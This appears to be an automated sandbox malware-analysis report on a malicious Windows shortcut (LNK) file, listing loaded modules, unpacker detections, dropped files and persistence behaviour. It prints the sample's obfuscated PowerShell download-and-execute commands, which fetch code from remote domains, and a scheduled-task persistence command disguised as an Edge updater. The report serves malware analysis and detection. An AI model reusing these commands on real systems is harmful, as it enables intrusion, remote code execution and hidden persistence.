Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: aclayers.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc_os.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: amsi.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: wldp.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: userenv.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: profapi.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: secur32.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: schannel.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: cryptnet.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: webio.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: cabinet.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: sxs.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: devenum.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: winmm.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: devobj.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: msdmo.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: aclayers.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc_os.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: rpQF1aDIK4.lnk LNK file: ..\..\..\Windows\system32\cmd.exe
Source: C:\Users\Public\ajbs50ul.bat File written: C:\Users\user\AppData\Roaming\miEk.ini Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\7.0\Outlook\Profiles\Outlook Jump to behavior
Source: Binary string: kernel32.pdbUGP source: regsvr32.exe, 00000008.00000003.1531905231.000000001C640000.00000004.00000001.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1531773811.000000001C580000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: kernelbase.pdbUGP source: regsvr32.exe, 00000008.00000003.1532489934.000000001C580000.00000004.00000001.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1533339761.000000001C860000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1540794217.0000022BF7CC0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1543994680.0000022BF7FA0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ntdll.pdb source: regsvr32.exe, 00000008.00000003.1531284036.000000001C770000.00000004.00000001.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1530854144.000000001C580000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1537268899.0000022BF7CC0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: kernel32.pdb source: regsvr32.exe, 00000008.00000003.1531905231.000000001C640000.00000004.00000001.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1531773811.000000001C580000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000008.00000003.1531284036.000000001C770000.00000004.00000001.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1530854144.000000001C580000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1537268899.0000022BF7CC0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: win32u.pdb source: wmpshare.exe
Source: Binary string: kernelbase.pdb source: regsvr32.exe, 00000008.00000003.1532489934.000000001C580000.00000004.00000001.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.1533339761.000000001C860000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1540794217.0000022BF7CC0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000C.00000003.1543994680.0000022BF7FA0000.00000004.00000001.00020000.00000000.sdmp

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: 8.3.regsvr32.exe.2c84fd0.7.raw.unpack, Redist.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 8.3.regsvr32.exe.2c84fd0.7.raw.unpack, Redist.cs .Net Code: CoreMain
Source: 8.2.regsvr32.exe.1b690000.3.raw.unpack, Redist.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 8.2.regsvr32.exe.1b690000.3.raw.unpack, Redist.cs .Net Code: CoreMain
Source: 8.3.regsvr32.exe.2c84fd0.6.raw.unpack, Redist.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 8.3.regsvr32.exe.2c84fd0.6.raw.unpack, Redist.cs .Net Code: CoreMain
Source: 8.2.regsvr32.exe.12f59ac0.2.raw.unpack, Redist.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 8.2.regsvr32.exe.12f59ac0.2.raw.unpack, Redist.cs .Net Code: CoreMain
Source: 8.2.regsvr32.exe.2c84fd0.0.raw.unpack, Redist.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 8.2.regsvr32.exe.2c84fd0.0.raw.unpack, Redist.cs .Net Code: CoreMain
Source: 12.3.OpenWith.exe.22bf86faa00.80.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 12.3.OpenWith.exe.22bf86faa00.80.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 12.3.OpenWith.exe.22bf86faa00.47.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 12.3.OpenWith.exe.22bf86faa00.47.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 12.3.OpenWith.exe.22bf86faa00.14.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 12.3.OpenWith.exe.22bf86faa00.14.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 12.3.OpenWith.exe.22bf86faa00.20.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 12.3.OpenWith.exe.22bf86faa00.20.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 12.3.OpenWith.exe.22bf86faa00.17.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 12.3.OpenWith.exe.22bf86faa00.17.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 12.3.OpenWith.exe.22bf86faa00.18.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 12.3.OpenWith.exe.22bf86faa00.18.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 12.3.OpenWith.exe.22bf86faa00.54.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 12.3.OpenWith.exe.22bf86faa00.54.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 12.3.OpenWith.exe.22bf86faa00.22.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 12.3.OpenWith.exe.22bf86faa00.22.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 12.3.OpenWith.exe.22bf86faa00.28.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 12.3.OpenWith.exe.22bf86faa00.28.raw.unpack, Runtime.cs .Net Code: CoreMain
Obfuscated command line found
Source: unknown Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c p""ow""er""s""h""ell/""W 0""1 $jufn='i'+'e'+''+'X';s""al bx1g $jufn;$ajbs50ul=bx1g(bx1g($($('(new-objecwxwl syswxwlem.newxwl.webc""lienwxwl).Dowgdvitring(''hv7i91h982d.bp24mostakp24.spacp24/tp24st.txt''.Replace(''v7i9'',''ttps://'').Replace(''p24'', ''e''))').Replace('wxwl', 't').Replace('gdvi', 'nloadS'))));exit
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe p""ow""er""s""h""ell /""W 0""1 $jufn='i'+'e'+''+'X';s""al bx1g $jufn;$ajbs50ul=bx1g(bx1g($($('(new-objecwxwl syswxwlem.newxwl.webc""lienwxwl).Dowgdvitring(''hv7i91h982d.bp24mostakp24.spacp24/tp24st.txt''.Replace(''v7i9'',''ttps://'').Replace(''p24'', ''e''))').Replace('wxwl', 't').Replace('gdvi', 'nloadS'))));exit
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe p""ow""er""s""h""ell /""W 0""1 $jufn='i'+'e'+''+'X';s""al bx1g $jufn;$ajbs50ul=bx1g(bx1g($($('(new-objecwxwl syswxwlem.newxwl.webc""lienwxwl).Dowgdvitring(''hv7i91h982d.bp24mostakp24.spacp24/tp24st.txt''.Replace(''v7i9'',''ttps://'').Replace(''p24'', ''e''))').Replace('wxwl', 't').Replace('gdvi', 'nloadS'))));exit Jump to behavior
Suspicious powershell command line found
Source: C:\Users\Public\ajbs50ul.bat Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/miEk.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{808CCC00-48CC-4040-C488-C044888CCCC0}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)"
Source: C:\Windows\System32\rekeywiz.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/u0ow.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{C88C8848-C040-4888-C800-C800848C4848}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)"
Source: C:\Users\Public\ajbs50ul.bat Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/miEk.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{808CCC00-48CC-4040-C488-C044888CCCC0}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)" Jump to behavior
Source: C:\Windows\System32\rekeywiz.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/u0ow.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{C88C8848-C040-4888-C800-C800848C4848}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)"
PE file contains sections with non-standard names
Source: utox_x86_x64.exe.3.dr Static PE information: section name: .rodata
Source: utox_x86_x64.exe.3.dr Static PE information: section name: .xdata
Source: utox_x86_x64.exe.3.dr Static PE information: section name: /4
Source: utox_x86_x64.exe.3.dr Static PE information: section name: /19
Source: utox_x86_x64.exe.3.dr Static PE information: section name: /31
Source: utox_x86_x64.exe.3.dr Static PE information: section name: /45
Source: utox_x86_x64.exe.3.dr Static PE information: section name: /57
Source: utox_x86_x64.exe.3.dr Static PE information: section name: /70
Source: utox_x86_x64.exe.3.dr Static PE information: section name: /81
Source: utox_x86_x64.exe.3.dr Static PE information: section name: /92
Source: ajbs50ul.bat.3.dr Static PE information: section name: .xdata
Source: miEk.ini.4.dr Static PE information: section name: .xdata
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FF887C31EC9 push ds; ret 3_2_00007FF887C31F02
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FF887C35CC3 push 00000063h; retf 3_2_00007FF887C35E04
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FF887C378E9 push 00000063h; retf 3_2_00007FF887C3790C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FF887C32CDD push 00000063h; retf 3_2_00007FF887C32D04
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FF887C37679 push 00000063h; retf 3_2_00007FF887C3767C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FF887C30685 push es; ret 3_2_00007FF887C306E2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FF887C36C99 push 00000063h; retf 3_2_00007FF887C36CBC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FF887C30C4D push cs; ret 3_2_00007FF887C30CAA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FF887C38842 push 00000063h; retf 3_2_00007FF887C3884C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FF887C35A72 push 00000063h; retf 3_2_00007FF887C35A9C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FF887C35C5B push 00000063h; retf 3_2_00007FF887C35E04
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FF887C3805C push 00000063h; retf 3_2_00007FF887C38074
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FF887C34465 push ebp; iretd 3_2_00007FF887C34468
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FF887C357FB push 00000063h; retf 3_2_00007FF887C35974
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FF887C333F9 push 00000063h; retf 3_2_00007FF887C3341C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FF887C32C05 push 00000063h; retf 3_2_00007FF887C32C24
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FF887C351C3 push esp; ret 3_2_00007FF887C351CA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FF887C383EB push 00000063h; retf 3_2_00007FF887C385AC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FF887C36DE9 push 00000063h; retf 3_2_00007FF887C36E0C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FF887C34783 push 00000063h; retf 3_2_00007FF887C348E4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FF887C32D9D push 00000063h; retf 3_2_00007FF887C32DBC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FF887C3375F push 00000063h; retf 3_2_00007FF887C33994
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FF887C3790F push 00000063h; retf 3_2_00007FF887C3790C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FF887C3790F push 00000063h; retf 3_2_00007FF887C37B14
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FF887C35513 push ebp; ret 3_2_00007FF887C35532
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FF887C35932 push 00000063h; retf 3_2_00007FF887C35974
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FF887A7D2A5 pushad ; iretd 5_2_00007FF887A7D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FF887B980CB push ebx; ret 5_2_00007FF887B9816A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FF887C67148 push eax; ret 5_2_00007FF887C67149
Source: C:\Windows\System32\regsvr32.exe Code function: 8_3_1B78430B push eax; retf 8_3_1B78430C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_3_1B7835EC push esi; ret 8_3_1B7835ED

Persistence and Installation Behavior
barindex
Windows shortcut file (LNK) starts blacklisted processes
Source: LNK file Process created: C:\Windows\System32\cmd.exe
Source: LNK file Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file Process created: C:\Windows\System32\regsvr32.exe
Source: LNK file Process created: C:\Windows\System32\regsvr32.exe
Source: LNK file Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file Process created: C:\Windows\System32\regsvr32.exe
Source: LNK file Process created: C:\Windows\System32\regsvr32.exe
Source: LNK file Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\regsvr32.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file Process created: C:\Windows\System32\regsvr32.exe
Drops PE files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Desktop\utox_x86_x64.exe Jump to dropped file
Source: C:\Users\Public\ajbs50ul.bat File created: C:\Users\user\AppData\Roaming\miEk.ini Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\ajbs50ul.bat Jump to dropped file
Source: C:\Windows\System32\rekeywiz.exe File created: C:\Users\user\AppData\Roaming\u0ow.ini Jump to dropped file
Drops PE files to the user directory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\ajbs50ul.bat Jump to dropped file
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\ajbs50ul.bat Jump to dropped file
Source: C:\Users\Public\ajbs50ul.bat File created: C:\Users\user\AppData\Roaming\miEk.ini Jump to dropped file
Source: C:\Windows\System32\rekeywiz.exe File created: C:\Users\user\AppData\Roaming\u0ow.ini Jump to dropped file

Boot Survival
barindex
Drops PE files to the user root directory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\ajbs50ul.bat Jump to dropped file
Powershell creates an autostart link
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: .lnk -Name));getit -fz ($fzf + 'utox_x86_x64.exe') -oulv 'htv7i9rockp24tdocs.lol/utox_x86.p24xp24';exit[Environment]::GetEnvironmentVariable('public') + '\\ajbs50ul.bat'(New-Object System.Net.WebClient).DownloadFile($oulv.Replace('v7i9','tps://').Replace('p24', 'e'), $fz)start $fz@{GUID="EEFCB906-B326-4E99-9F54-8B4BB6EF3C6D"Author="Microsoft Corporation"CompanyName="Microsoft Corporation"Copyright=" Microsoft Corporation. All rights reserved."ModuleVersion="3.1.0.0"PowerShellVersion="5.1"CLRVersion="4.0"NestedModules="Microsoft.PowerShell.Commands.Management.dll"HelpInfoURI = 'https://go.microsoft.com/fwlink/?linkid=390785'AliasesToExport = @("gcb", "scb", "gin", "gtz", "stz")FunctionsToExport = @()CmdletsToExport=@("Add-Content", "Clear-Content", "Clear-ItemProperty", "Join-Path", "Convert-Path", "Copy-ItemProperty", "Get-EventLog", "Clear-EventLog", "Write-EventLog", "Limit-EventLog", "Show-EventLog", "New-EventLog", "Remove-EventLog", "Get-ChildItem", "Get-Content", "Get-ItemProperty", "Get-ItemPropertyValue", "Get-WmiObject", "Invoke-WmiMethod", "Move-ItemProperty", "Get-Location", "Set-Location", "Push-Location", "Pop-Location", "New-PSDrive", "Remove-PSDrive", "Get-PSDrive", "Get-Item", "New-Item", "Set-Item", "Remove-Item", "Move-Item", "Rename-Item", "Copy-Item", "Clear-Item", "Invoke-Item", "Get-PSProvider", "New-ItemProperty", "Split-Path", "Test-Path", "Get-Process", "Stop-Process", "Wait-Process", "Debug-Process", "Start-Process", "Remove-ItemProperty", "Remove-WmiObject", "Rename-ItemProperty", "Register-WmiEvent", "Resolve-Path", "Get-Service", "Stop-Service", "Start-Service", "Suspend-Service", "Resume-Service", "Restart-Service", "Set-Service", "New-Service", "Set-Content", "Set-ItemProperty", "Set-WmiInstance", "Get-Transaction", "Start-Transaction", "Complete-Transaction", "Undo-Transaction", "Use-Transaction", "New-WebServiceProxy", "Get-HotFix", "Test-Connection", "Enable-ComputerRestore", "Disable-ComputerRestore", "Checkpoint-Computer", "Get-ComputerRestorePoint", "Restart-Computer", "Stop-Computer", "Restore-Computer", "Add-Computer", "Remove-Computer", "Test-ComputerSecureChannel", "Reset-ComputerMachinePassword", "Rename-Computer", "Get-ControlPanelItem", "Show-ControlPanelItem", "Clear-Recyclebin", "Get-Clipboard", "Set-Clipboard", "Get-ComputerInfo", "Get-TimeZone", "Set-TimeZone")CompatiblePSEditions = @('Desktop','Core')} if ($_.FullyQualifiedErrorId -ne "NativeCommandErrorMessage" -and $ErrorView -ne "CategoryView") { $myinv = $_.InvocationInfo if ($myinv -and $myinv.MyCommand)

Hooking and other Techniques for Hiding and Protection
barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
